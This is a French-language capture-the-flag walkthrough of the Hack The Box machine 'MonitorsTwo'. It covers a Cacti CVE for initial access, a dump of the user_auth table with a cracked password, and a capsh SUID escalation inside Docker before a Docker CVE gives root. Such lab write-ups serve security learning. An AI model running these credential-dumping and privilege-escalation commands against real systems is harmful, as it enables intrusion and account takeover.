10 - MonitorsTwo 

Nmap :
		┌──(root💀kali)-[~/Hackthebox/10-MonitorsTwo]
		└─# nmap 10.10.11.211 -T5 -Pn -sV -sC
		Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-02 14:29 CEST
		Nmap scan report for 10.10.11.211
		Host is up (0.087s latency).
		Not shown: 998 closed tcp ports (reset)
		PORT   STATE SERVICE VERSION
		22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
		| ssh-hostkey: 
		|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
		|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
		|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
		80/tcp open  http    nginx 1.18.0 (Ubuntu)
		|_http-server-header: nginx/1.18.0 (Ubuntu)
		|_http-title: Login to Cacti
		Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

		Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
		Nmap done: 1 IP address (1 host up) scanned in 11.81 seconds

On va sur le site :
	on voit :
		cacti 1.2.22

		on trouve la CVE-2022-46169
		on execute le payload


Sur la machine on remarque le fichier :
	- entrypoint.sh a la racine
	- Il n'y a pas de user dans le /home
	- Probablement un docker

	entrypoint.sh => on trouve : 	mysql --host=db --user=root --password=root cacti

	On fait :	 mysql --host=db --user=root --password=root cacti -e "select * from user_auth;"

	id      username        password        realm   full_name       email_address   must_change_password    password_change     show_tree       show_list       show_preview    graph_settings  login_opts      policy_graphs   policy_treespolicy_hosts    policy_graph_templates  enabled lastchange      lastlogin       password_history        locked  failed_attempts     lastfail        reset_perms
1       admin   $2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC    0       Jamie Thompson  admin@monitorstwo.htb               on      on      on      on      on      2       1       1       1       1       on      -1 -1       -1              0       0       663348655
3       guest   43e9a4ab75570f5b        0       Guest Account           on      on      on      on      on      3  11       1       1       1               -1      -1      -1              0       0       0
4       marcus  $2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C    0       Marcus Brune    marcus@monitorstwo.htb                      on      on      on      on      1       1       1       1       1       on      -1 -1               on      0       0       2135691668


	avec hashcat : $2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C:funkymonkey

	ssh marcus@10.10.11.211
	funkymonkey

	On a le flasg user

	marcus@monitorstwo:~$ docker -v
	Docker version 20.10.5+dfsg1, build 55c4c88

	vuln : cve-2021-41091

	Il faut dabort les droit root dans le docker, on utilise : 
			find / -perm -u=s -type f 2>/dev/null
			ca donne :
				/usr/bin/gpasswd
				/usr/bin/passwd
				/usr/bin/chsh
				/usr/bin/chfn
				/usr/bin/newgrp
				/sbin/capsh
				/bin/mount
				/bin/umount
				/bin/su

			On utlise gtfobins pour trouver comment avec CAPSH on passe Root du DOCKER :
				capsh --gid=0 --uid=0 --
				puis on fait chmod u+s /bin/bash




	Puis on utilise l'exploit de la CVE sur le user marcus :
		on passe root : GG



